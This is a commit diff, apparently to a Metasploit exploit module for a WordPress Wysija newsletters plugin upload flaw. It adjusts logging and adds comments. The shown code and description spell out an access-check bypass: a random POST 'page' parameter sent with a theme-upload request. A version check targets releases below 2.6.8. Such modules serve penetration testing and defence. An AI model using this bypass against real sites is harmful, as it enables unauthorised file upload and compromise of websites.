Changed to vprint and added comment

Author: firefart

modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb

@@ -27,7 +27,8 @@ def initialize(info = {})
           a POST variable overwrites a GET variable in the $_REQUEST array. The plugin
           uses $_REQUEST to check for access rights. By setting the POST parameter to
           something not beginning with 'wysija_', the check is bypassed. Wordpress uses
-          the $_GET array to determine the page, so it is not affected by this.
+          the $_GET array to determine the page, so it is not affected by this. The developers
+          applied the fixes to all previous versions too.
       },
       'Author'         =>
         [
@@ -85,7 +86,7 @@ def check
     # readme present, but no version number
     return Msf::Exploit::CheckCode::Detected if version.nil?
 
-    print_status("#{peer} - Found version #{version} of the plugin")
+    vprint_status("#{peer} - Found version #{version} of the plugin")
 
     if Gem::Version.new(version) < Gem::Version.new('2.6.8')
       return Msf::Exploit::CheckCode::Appears
@@ -107,6 +108,7 @@ def exploit
     data.add_part('on', nil, nil, 'form-data; name="overwriteexistingtheme"')
     data.add_part('themeupload', nil, nil, 'form-data; name="action"')
     data.add_part('Upload', nil, nil, 'form-data; name="submitter"')
+    # this line bypasses the check implemented in version 2.6.7
     data.add_part(rand_text_alpha(10), nil, nil, 'form-data; name="page"')
     post_data = data.to_s